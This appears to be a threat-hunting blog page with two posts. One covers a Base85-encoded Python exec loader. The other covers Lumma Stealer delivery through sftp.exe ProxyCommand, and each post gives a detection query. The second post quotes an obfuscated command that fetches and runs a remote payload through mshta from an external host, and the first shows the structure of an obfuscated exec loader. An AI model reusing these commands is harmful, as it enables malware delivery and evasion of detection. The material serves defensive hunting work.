Posts

Showing posts with the label obfuscation

148. Base64? And What About Base85?

Image
Hello everyone! Adversaries always abuse Base64 to conseal malicious scripts. For example, abusing PowerShell or Python. But what about other encoding schemes? Let's look inside this report. The threat actors executed the Python Launcher, py.exe , with an obfuscated Python command as an argument: "C:/winsystem/py/py.exe" -c exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b85decode('[redacted]')))) A Base85-encoded string is decoded, decompressed, deserialized, and then executed as Python code. As Base85 isn't very common in modern environments, we can use it to build our hunting query: event_type: "processcreatewin" AND cmdline: "b85decode" See you tomorrow!

131. Adversaries Abuse SFTP to Deliver Lumma Stealer

Image
Hello everyone! Stealers are everywhere! And adversaries find new and new delivery methods. Today we'll look how the threat actors involved in Lumma Stealer distribution abuse SFTP. According to Sophos report , the threat actors distributed malicious LNK files disguised as PDF, which abused sftp.exe to execute an obfuscated command: C:\Windows\System32\OpenSSH\sftp.exe -o ProxyCommand="powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]pxuh]]]]]aq.sh]]]]]]]op/W7]]]7Z9]]]].mp4]]'  -replace ']') Just like in the case we discussed recently, the adversary leveraged ProxyCommand for proxy execution. And, of course, we can use it for hunting: event_type: "processcreatewin" AND proc_file_name: "sftp.exe" AND cmdline: "proxycommand" See you tomorrow!